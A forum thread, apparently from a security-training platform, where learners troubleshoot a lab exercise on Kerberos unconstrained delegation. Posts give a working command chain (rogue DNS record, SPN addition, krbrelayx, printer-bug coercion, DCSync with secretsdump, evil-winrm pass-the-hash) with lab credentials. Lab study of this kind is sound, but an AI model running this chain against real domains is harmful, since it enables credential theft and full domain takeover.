hi all. I beg you, help me, encourage me to the correct answer. I am running the “KERBEROS ATTACKS” module. I ran into difficulties in the “Unconstrained Delegation - Users” section. I need help solving a task, maybe I’m doing something wrong or I misunderstood the task and am applying the data from the task

callum.dixon:C@lluMDIXON has an unrestricted delegation set, and carole.rose:jasmine has a universal write on top of callum.dixon. Using this information, try to compromise the domain and read the contents of C:\flag.txt on DC01.

so let’s go in order what I do

1. fake dns

I add to /etc/hosts roguecomputer.inlanefreight.local
python dnstool.py -u INLANEFREIGHT.LOCAL\\carole.rose -p jasmine -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.99.99.99 --action add 10.129.205.35

2. create the SPN of the target user (callum.dixon)

python addspn.py -u inlanefreight.local\\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

3. Run krbrelay.py with the password callum.dixon

python krbrelayx.py -p C@lluMDIXON

4. Run printerbug.py as carole.rose to get the ticket

python printerbug.py inlanefreight.local/carole.rose:jasmine@10.129.205.35 roguecomputer.inlanefreight.local
and I catch the carole.rose ticket in the session where krbrelayx.py is running

5. Exporting the ticket

export KRB5CCNAME=./DC01\$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache

6. I’m trying to reset hashes using secretdump.py to get the admin hash and I get an error

secretsdump.py -k -no-pass dc01.inlanefreight.local
Impacket v0.12.0.dev1+20230907.33311.3f645107 - Copyright 2023 Fortra

[-] Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user
[*] Cleaning up...

Okay, we understand that it may not be possible to perform DCSync. So I thought about stealing the flag using SMB, but it didn’t work, I just got an error using the Kerberos ticket “[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused”. But if you connected with credentials, then naturally you got access, but not to the C drive :')
Please help me with the task.

@Alt_F4 What command you are using to connect to 10.129.205.35 machine.? Could you please help me with this?

hi @tigerboy, if you connect without a ticket, you can connect using credentials using the following command:

smbclient.py carole.rose@dc01.inlanefreight.local

But this will not give you anything, because we need to get the admin hash and we need to carry out an attack like in the section to reset the hashes.
if we add options (-k -no-pass) to the command above then we will get an error “[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused”

Well, if we reset the hash for a specific user, we will get a combo of the errors above

secretsdump.py -k -no-pass dc01.inlanefreight.local -just-dc-user administrator
Impacket v0.12.0.dev1+20230907.33311.3f645107 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] [Errno Connection error (INLANEFREIGHT.LOCAL:88)] [Errno 111] Connection refused
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

@tigerboy Hello. I decided and pulled the flag. I had to combine the attack of this part and the previous task. I still don’t understand what the problem is with the Kerberos error in this module. In general, my solution is just take the admin hash from the previous task and try to connect using some kind of
impacket module. Good luck!

Have you made any changes into system before running above command. I am not receiving connection refused error in the response.

try adding additional options. Use -h to figure out what you need. Pay attention to the target and ip options

Same problems as you when trying to perform a DC Sync.
Used NT Hash from previous task in the end.
Anyone was able to complete this task following the instructions?

was anyone able to get the flag? i have the same problem? what is the alternative? i have tried 2 different impakcet tools ,but still not able to access dc01

smbclient.py should work. Of course it’s not the intended way. I have tried to open an issue with Support about this task, asking them to investigate why DC Sync does not work

Thanks for replying.

I tried using smbclient.py ,but ti didnt work. i use for administrator account from the last activity and for the dc01$ ,but none work. for carolone it gives no results back. May i ask you the syntax you used?
thank you

replied privately

hey man, would you be able guide me with this? seems there is a tech issue and I am not sure what the dc ip is … is it the same ip mentioned in the example?

if I’m not wrong, the DC is the target machine itself so you just spin up the target and that is the IP to use

When you issue the secretsdump command make sure you specify the -target-ip and the -dc-ip and the target domainname/user and it should work

If you try to issue the secrets dump command with just the domain name after adding it to the hosts file it will not work or atleast it didnt work for me unless i specified the -target-ip and the -dc-ip and in the excercise they are the same but you still have to specify both

Could you please pm me the command you used? Bc it didn’t work for me. Maybe I did smth wrong.

Sent it to you!! Hopefully it works out for you! Let me know if you still need help.

Does anybody know what the problem is? The commands execute successfully until krbrelayx.py -p C@lluMDIXON:

python dnstool.py -u INLANEFREIGHT.LOCAL\callum.dixon -p C@lluMDIXON -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.219 --action add 10.129.205.35

python addspn.py -u inlanefreight.local\carole.rose -p jasmine --target-type samname -t callum.dixon -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local

python krbrelayx.py -p C@llumDIXON

and I get this error and no ticket:

image1505×729 197 KB

this is my /etc/hosts file:

This one was pretty frustrating. I had to convert callum.dixon’s password into a ntlm hash, then run sudo python krbrelayx.py -hashes : with the hash, after that I finally recieved the TGT and then exported the ticket, I then was able to DCSync with secretsdump.py -k -no-pass dc01.inlanefreight.local and get the Administrator’s hash, from there I could use evil-winrm with the hash.

did you get it to work?

When I did it it worked for me using the commands in the module.
But the /etc/hosts file looks like the below:

10.129.x.y inlanefreight.local dc01.inlanefreight.local

So: First the IP, then the domain then the hostname.